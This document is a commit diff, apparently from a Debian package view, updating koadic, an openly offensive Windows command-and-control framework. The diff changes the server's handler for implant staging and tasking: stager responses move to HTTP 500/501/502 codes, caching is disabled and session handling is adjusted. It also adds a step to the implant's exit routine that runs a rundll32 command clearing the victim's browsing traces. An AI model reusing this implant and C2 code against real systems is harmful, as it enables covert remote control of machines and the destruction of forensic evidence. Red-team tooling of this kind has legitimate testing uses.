Commit 9843e9e120198b74d2035d9731d73b1bf9f9366c - koadic

Update upstream source from tag 'upstream/0_git20210412' Update to upstream version '0~git20210412' with Debian dir ae8f178e145e5d67197853c60554d0e6bbd138cb Sophie Brun 2 years ago

6 changed file(s) with 52 addition(s) and 24 deletion(s). Raw diff Collapse all Expand all

-1

Dockerfile less more

0		FROM ubuntu:19.10
	0	FROM ubuntu:20.04
1	1	WORKDIR /opt/koadic
2	2	RUN apt-get update && apt-get install -y python3 python3-pip socat
3	3	COPY . /opt/koadic

+42

-14

core/handler.py less more

0	0	from socketserver import ThreadingMixIn
1	1	from http.server import BaseHTTPRequestHandler, HTTPServer
2		from urllib.parse import parse_qs
	2	#from urllib.parse import parse_qs
3	3
4	4	import cgi
5	5	import socket

27	27	for key, value in headers.items():
28	28	self.send_header(key, value)
29	29
	30	self.send_header('Cache-Control', 'no-store, max-age=0')
	31	self.send_header('If-Modified-Since', '0')
	32
30	33	self.end_headers()
31	34
32	35	# python is so utterly incapable that we have to write CS 101 socket

50	53	headers = {}
51	54	headers['Content-Type'] = 'application/octet-stream'
52	55	headers['Content-Length'] = len(fdata)
53		self.reply(200, fdata, headers)
	56	self.reply(500, fdata, headers)
54	57
55	58	def get_header(self, header, default=None):
56	59	if header in self.headers:

106	109
107	110	def find_stager(self, splitted):
108	111	self.endpoint = splitted[0].split("/")[1].split(".")[0]
	112	self.shell.print_verbose(f"handler::find_stager() - endpoint identified = {self.endpoint}")
109	113
110	114	if self.endpoint not in self.shell.stagers[self.port]:
	115	self.shell.print_verbose(f"handler::find_stager() - could not find a listener on port {self.port} for this endpoint")
111	116	return False
112	117
113	118	self.stager = self.shell.stagers[self.port][self.endpoint]
114	119	self.options = copy.deepcopy(self.stager.options)
115	120	return True
116	121
	122	def parse_qs(self, qs):
	123	params = {}
	124	if len(qs) < 2:
	125	return params
	126	for p in qs[1].split(';'):
	127	if not p:
	128	continue
	129	pp = p.split('=', 1)
	130	if len(pp) != 2:
	131	continue
	132	pk = pp[0]
	133	pv = pp[1]
	134	if len(pv):
	135	params[pk] = [pv]
	136	return params
	137
117	138	def parse_params(self):
	139	self.shell.print_verbose(f"handler::parse_params() - path = {self.path}")
118	140	splitted = self.path.split("?")
119	141	if not self.find_stager(splitted):
120	142	return False
121		self.get_params = parse_qs(splitted[1]) if len(splitted) > 1 else {}
	143	#self.get_params = parse_qs(splitted[1]) if len(splitted) > 1 else {}
	144	self.get_params = self.parse_qs(splitted)
122	145
123	146	sessionname = self.options.get("SESSIONNAME")
124	147

149	172
150	173	elif self.shell.continuesession:
151	174	self.session = self.shell.continuesession
	175
	176	if self.headers['user-agent']:
	177	self.shell.print_verbose(f"handler::parse_params() - user_agent = {self.headers['user-agent']}")
	178	if 'compatible' not in self.headers['user-agent'] and 'Microsoft BITS' not in self.headers['user-agent']:
	179	self.shell.print_warning("Are you running this payload from a browser? Koadic payloads are not meant to be launched from a browser. If a zombie isn't staging and you're seeing this warning, please don't post a ticket on Github. Run the FULL payload as a command.")
152	180
153	181	if self.headers['host']:
154	182	self.shell.print_verbose(f"handler::parse_params() - Host header present: {self.headers['host']}")

239	267	for o in old_options.options:
240	268	plugin.options.set(o.name, o.value)
241	269
242		return self.reply(200)
	270	return self.reply(500)
243	271
244	272
245	273	return self.handle_report()

251	279	self.options.set("JOBKEY", "stage")
252	280	template = self.options.get("_FORKTEMPLATE_")
253	281	data = self.linter.post_process_script(self.options.get("_STAGE_"), template, self.options, self.session)
254		self.reply(200, data)
	282	self.reply(500, data)
255	283
256	284	def handle_oneshot(self):
257	285	plugin = self.shell.plugins[self.options.get("MODULE")]

263	291	template = self.options.get("_STAGETEMPLATE_")
264	292	script = self.linter.post_process_script(script, template, self.options, self.session)
265	293
266		self.reply(200, script)
	294	self.reply(500, script)
267	295	return
268	296
269	297	j.ip = str(self.client_address[0])

275	303	template = self.options.get("_STAGETEMPLATE_")
276	304	script = self.linter.post_process_script(script, template, self.options, self.session)
277	305
278		self.reply(200, script)
	306	self.reply(500, script)
279	307
280	308	def handle_new_session(self):
281	309	self.shell.print_verbose("handler::handle_new_session()")
282	310	self.init_session()
283	311	template = self.options.get("_STAGETEMPLATE_")
284	312	data = self.linter.post_process_script(self.options.get("_STAGE_"), template, self.options, self.session)
285		self.reply(200, data)
	313	self.reply(500, data)
286	314
287	315	def handle_dont_stage(self):
288	316	self.shell.print_verbose("handler::handle_dont_stage()")
289	317	template = self.options.get("_STAGETEMPLATE_")
290	318	data = self.linter.post_process_script(b"Koadic.exit();", template, self.options, self.session)
291		self.reply(200, data)
	319	self.reply(500, data)
292	320
293	321	def handle_bitsadmin_stage(self):
294	322	rangeheader = self.get_header('range')

313	341	script = self.job.payload()
314	342	template = self.options.get("_FORKTEMPLATE_")
315	343	script = self.linter.post_process_script(script, template, self.options, self.session)
316		self.reply(200, script)
	344	self.reply(500, script)
317	345
318	346	def handle_work(self):
319	347	count = 0
320	348	while True:
321	349	if self.session.killed:
322		return self.reply(500, "");
	350	return self.reply(599, "");
323	351
324	352	job = self.session.get_created_job()
325	353	if job is not None:

334	362	self.session.update_active()
335	363	count += 1
336	364	if count > 600:
337		self.reply(201, "")
	365	self.reply(501, "")
338	366	return
339	367
340	368	job.receive()
341	369
342	370	# hack to tell us to fork 32 bit
343		status = 202 if job.fork32Bit else 201
	371	status = 502 if job.fork32Bit else 501
344	372
345	373	self.reply(status, job.key.encode())
346	374

353	381	errdesc = self.get_header('errdesc', 'No Description')
354	382	errname = self.get_header('errname', 'Error')
355	383	self.job.error(errno, errdesc, errname, data)
356		self.reply(200)
	384	self.reply(500)
357	385	return
358	386
359	387	self.job.report(self, data)

-2

core/linter.py less more

174	174	if "Koadic.file.readText" not in script and shellexecflag and filereadbinaryflag:
175	175	stdlib = stdlib.split("//file.readText.start")[0] + stdlib.split("//file.readText.end")[1]
176	176	filereadtextflag = True
177		if "Koadic.shell.run" not in script and filereadbinaryflag and filereadtextflag:
178		stdlib = stdlib.split("//shell.run.start")[0] + stdlib.split("//shell.run.end")[1]
	177	# if "Koadic.shell.run" not in script and filereadbinaryflag and filereadtextflag:
	178	# stdlib = stdlib.split("//shell.run.start")[0] + stdlib.split("//shell.run.end")[1]
179	179	if "Koadic.user.encoder" not in script and userinfoflag and httpuploadflag and httpaddheadersflag and shellexecflag and filereadbinaryflag:
180	180	stdlib = stdlib.split("//user.encoder.start")[0] + stdlib.split("//user.encoder.end")[1]
181	181	if "Koadic.uuid" not in script and userinfoflag and useriselevatedflag and useripaddrsflag and filereadbinaryflag:

-2

data/stager/js/stage.js less more

47	47	var work = Koadic.work.get();
48	48	// 201 = x64 or x86
49	49	// 202 = force x86
50		if (work.status == 201 \|\| work.status == 202)
	50	if (work.status == 501 \|\| work.status == 502)
51	51	{
52	52	if (work.responseText.length > 0) {
53	53	var jobkey = work.responseText;
54		Koadic.work.fork(jobkey, work.status == 202);
	54	Koadic.work.fork(jobkey, work.status == 502);
55	55	}
56	56	}
57	57	else // if (work.status == 500) // kill code

-1

data/stager/js/stdlib.js less more

39	39	//exit.start
40	40	Koadic.exit = function()
41	41	{
	42	Koadic.shell.run("rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 264", false);
42	43	if (Koadic.isHTA())
43	44	{
44	45	// crappy hack?

562	563	var data = (typeof(data) !== "undefined") ? data : "";
563	564	//var http = new ActiveXObject("Microsoft.XMLHTTP");
564	565	var http = Koadic.http.create();
565
566	566	http.open("POST", url, false);
567	567	Koadic.http.addHeaders(http, headers);
568	568	// alert("---Making request---\n" + url + '\n' + "--Data--\n" + data);

-4

modules/implant/fun/thunderstruck.py less more

6	6	def create(self):
7	7	if self.session_id == -1:
8	8	response = urllib.request.urlopen(self.options.get("VIDEOURL")).read().decode()
9		ms = response.split('approxDurationMs\\":\\"')[1].split("\\")[0]
10		seconds = int(ms)//1000
	9	ms = response.split('approxDurationMs')[1].split(',')[0]
	10	seconds = int(''.join([s for s in ms if s.isdigit()]))//1000
11	11	self.options.set("SECONDS", str(seconds+1))
12	12
13	13	def done(self):

31	31	def run(self):
32	32	self.shell.print_status("Retrieving video length...")
33	33	response = urllib.request.urlopen(self.options.get("VIDEOURL")).read().decode()
34		ms = response.split('approxDurationMs\\":\\"')[1].split("\\")[0]
35		seconds = int(ms)//1000
	34	ms = response.split('approxDurationMs')[1].split(',')[0]
	35	seconds = int(''.join([s for s in ms if s.isdigit()]))//1000
36	36	self.shell.print_status(f"Video length: {seconds} seconds")
37	37
38	38	self.options.set("SECONDS", str(seconds+1))